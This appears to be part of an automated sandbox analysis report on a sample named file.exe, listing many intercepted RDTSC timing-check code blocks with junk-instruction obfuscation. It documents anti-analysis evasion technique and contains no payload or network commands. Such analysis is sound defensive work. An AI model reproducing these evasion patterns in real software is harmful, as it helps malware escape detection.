Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6A623C second address: 6A6240 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6A6240 second address: 6A6244 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6A6390 second address: 6A639F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jne 00007FC714E8FEEAh 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6A67AF second address: 6A67D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC714E98431h 0x00000009 jp 00007FC714E98426h 0x0000000f popad 0x00000010 pop edi 0x00000011 pushad 0x00000012 jng 00007FC714E9842Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6A67D5 second address: 6A67DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6A6902 second address: 6A6908 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6A6908 second address: 6A690F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6A690F second address: 6A697A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC714E98428h 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007FC714E98436h 0x00000010 jmp 00007FC714E9842Bh 0x00000015 jmp 00007FC714E98439h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FC714E98437h 0x00000024 push edi 0x00000025 pushad 0x00000026 popad 0x00000027 jnp 00007FC714E98426h 0x0000002d pop edi 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6A8863 second address: 6A887F instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC714E8FEE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 js 00007FC714E8FEF8h 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6A887F second address: 6A8883 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6A8883 second address: 6A8887 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6A8923 second address: 6A8929 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6A8C53 second address: 6A8C59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A8F7B second address: 6A8F7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A97D0 second address: 6A97DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FC714E8FEE6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A97DF second address: 6A97F0 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC714E98426h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AAEBD second address: 6AAEC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AAEC3 second address: 6AAEC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AAEC7 second address: 6AAED7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FC714E8FEEAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AAED7 second address: 6AAEE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC714E9842Ah 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AAEE5 second address: 6AAF0D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC714E8FEF0h 0x00000007 je 00007FC714E8FEE6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ecx 0x00000010 jmp 00007FC714E8FEEBh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AB5B5 second address: 6AB5B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AB5B9 second address: 6AB5DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FC714E8FEF7h 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AB5DE second address: 6AB5E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FC714E98426h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6ACFDA second address: 6ACFF0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 jp 00007FC714E8FF05h 0x0000000e push eax 0x0000000f push edx 0x00000010 js 00007FC714E8FEE6h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AF193 second address: 6AF197 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AF197 second address: 6AF1BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007FC714E8FEEFh 0x0000000c pop ebx 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 jnl 00007FC714E8FEE6h 0x00000018 pop esi 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AF1BA second address: 6AF25A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC714E9842Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007FC714E98428h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 mov si, di 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push ebp 0x0000002c call 00007FC714E98428h 0x00000031 pop ebp 0x00000032 mov dword ptr [esp+04h], ebp 0x00000036 add dword ptr [esp+04h], 0000001Dh 0x0000003e inc ebp 0x0000003f push ebp 0x00000040 ret 0x00000041 pop ebp 0x00000042 ret 0x00000043 adc di, 955Dh 0x00000048 mov dword ptr [ebp+12472CB3h], ebx 0x0000004e push 00000000h 0x00000050 push 00000000h 0x00000052 push ecx 0x00000053 call 00007FC714E98428h 0x00000058 pop ecx 0x00000059 mov dword ptr [esp+04h], ecx 0x0000005d add dword ptr [esp+04h], 00000015h 0x00000065 inc ecx 0x00000066 push ecx 0x00000067 ret 0x00000068 pop ecx 0x00000069 ret 0x0000006a mov di, dx 0x0000006d mov dword ptr [ebp+122D2832h], edx 0x00000073 xchg eax, ebx 0x00000074 push eax 0x00000075 push edx 0x00000076 jno 00007FC714E9842Ch 0x0000007c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AFCEC second address: 6AFD45 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 jmp 00007FC714E8FEF7h 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push ebx 0x00000013 call 00007FC714E8FEE8h 0x00000018 pop ebx 0x00000019 mov dword ptr [esp+04h], ebx 0x0000001d add dword ptr [esp+04h], 0000001Bh 0x00000025 inc ebx 0x00000026 push ebx 0x00000027 ret 0x00000028 pop ebx 0x00000029 ret 0x0000002a sub dword ptr [ebp+1246320Ch], ecx 0x00000030 mov di, 01A2h 0x00000034 push eax 0x00000035 pushad 0x00000036 jng 00007FC714E8FEECh 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AFABB second address: 6AFAD7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC714E98435h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AFAD7 second address: 6AFADD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AFADD second address: 6AFAEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AFAEA second address: 6AFAF0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B238C second address: 6B239F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a push edx 0x0000000b jl 00007FC714E98426h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65D190 second address: 65D196 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B34B4 second address: 6B34C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 push edx 0x0000000a pop edx 0x0000000b pop edi 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B6490 second address: 6B6496 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B6496 second address: 6B649A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B649A second address: 6B6523 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 cld 0x0000000a adc ebx, 731D5015h 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ecx 0x00000015 call 00007FC714E8FEE8h 0x0000001a pop ecx 0x0000001b mov dword ptr [esp+04h], ecx 0x0000001f add dword ptr [esp+04h], 00000017h 0x00000027 inc ecx 0x00000028 push ecx 0x00000029 ret 0x0000002a pop ecx 0x0000002b ret 0x0000002c sbb bl, 00000013h 0x0000002f mov dword ptr [ebp+122D23C7h], ecx 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push edi 0x0000003a call 00007FC714E8FEE8h 0x0000003f pop edi 0x00000040 mov dword ptr [esp+04h], edi 0x00000044 add dword ptr [esp+04h], 00000016h 0x0000004c inc edi 0x0000004d push edi 0x0000004e ret 0x0000004f pop edi 0x00000050 ret 0x00000051 xchg eax, esi 0x00000052 jno 00007FC714E8FF04h 0x00000058 push eax 0x00000059 push esi 0x0000005a push eax 0x0000005b push edx 0x0000005c jnl 00007FC714E8FEE6h 0x00000062 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B757B second address: 6B75AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC714E98437h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d jmp 00007FC714E98434h 0x00000012 pop edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B9625 second address: 6B963B instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC714E8FEE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c je 00007FC714E8FEF4h 0x00000012 push eax 0x00000013 push edx 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BD78E second address: 6BD798 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FC714E98426h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BD798 second address: 6BD79C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B6741 second address: 6B6751 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007FC714E98428h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B6751 second address: 6B6757 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C16CC second address: 6C16D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B9821 second address: 6B9828 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C37E8 second address: 6C37F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B9828 second address: 6B9839 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pushad 0x0000000f popad 0x00000010 pop eax 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B9839 second address: 6B983E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C37F2 second address: 6C3803 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007FC714E8FEE8h 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C3803 second address: 6C3809 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B98E9 second address: 6B98ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B98ED second address: 6B98F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C492A second address: 6C492E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BA85E second address: 6BA868 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC714E9842Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BA868 second address: 6BA875 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pushad 0x0000000b popad 0x0000000c pop edi 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BA875 second address: 6BA887 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC714E9842Eh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C599E second address: 6C59AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007FC714E8FEE6h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BC734 second address: 6BC73B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C18EC second address: 6C18F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C18F2 second address: 6C1901 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C1901 second address: 6C1905 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C1905 second address: 6C190F instructions: 0x00000000 rdtsc 0x00000002 js 00007FC714E98426h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C39CA second address: 6C39CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C19C0 second address: 6C19C6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C19C6 second address: 6C19CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C19CC second address: 6C19D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BE97D second address: 6BE9F9 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC714E8FEECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b clc 0x0000000c push dword ptr fs:[00000000h] 0x00000013 stc 0x00000014 mov dword ptr fs:[00000000h], esp 0x0000001b jmp 00007FC714E8FEF3h 0x00000020 mov eax, dword ptr [ebp+122D1211h] 0x00000026 mov di, cx 0x00000029 push FFFFFFFFh 0x0000002b push 00000000h 0x0000002d push eax 0x0000002e call 00007FC714E8FEE8h 0x00000033 pop eax 0x00000034 mov dword ptr [esp+04h], eax 0x00000038 add dword ptr [esp+04h], 00000019h 0x00000040 inc eax 0x00000041 push eax 0x00000042 ret 0x00000043 pop eax 0x00000044 ret 0x00000045 jc 00007FC714E8FEEEh 0x0000004b push edx 0x0000004c je 00007FC714E8FEE6h 0x00000052 pop ebx 0x00000053 nop 0x00000054 pushad 0x00000055 push eax 0x00000056 push ecx 0x00000057 pop ecx 0x00000058 pop eax 0x00000059 js 00007FC714E8FEECh 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D0778 second address: 6D0784 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 ja 00007FC714E98426h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D0784 second address: 6D0788 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D0788 second address: 6D07B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jmp 00007FC714E98438h 0x0000000e pop ebx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D0A76 second address: 6D0A7E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D0A7E second address: 6D0A9D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC714E9842Ch 0x00000007 push ebx 0x00000008 jmp 00007FC714E9842Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DC035 second address: 6DC053 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jnl 00007FC714E8FEE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007FC714E8FEE6h 0x00000014 jmp 00007FC714E8FEEAh 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DACBB second address: 6DACC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DB26B second address: 6DB296 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC714E8FEEAh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC714E8FEF4h 0x00000011 jbe 00007FC714E8FEE6h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DB5AE second address: 6DB5B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DB5B2 second address: 6DB5D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC714E8FEF5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DBA54 second address: 6DBA68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC714E98430h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DBA68 second address: 6DBA6E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DBA6E second address: 6DBA74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DBA74 second address: 6DBA80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jnc 00007FC714E8FEE6h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DBA80 second address: 6DBA84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DBA84 second address: 6DBAA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FC714E8FEE8h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 jg 00007FC714E8FEE6h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DBAA0 second address: 6DBAAA instructions: 0x00000000 rdtsc 0x00000002 js 00007FC714E98426h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DBAAA second address: 6DBAB5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FC714E8FEE6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
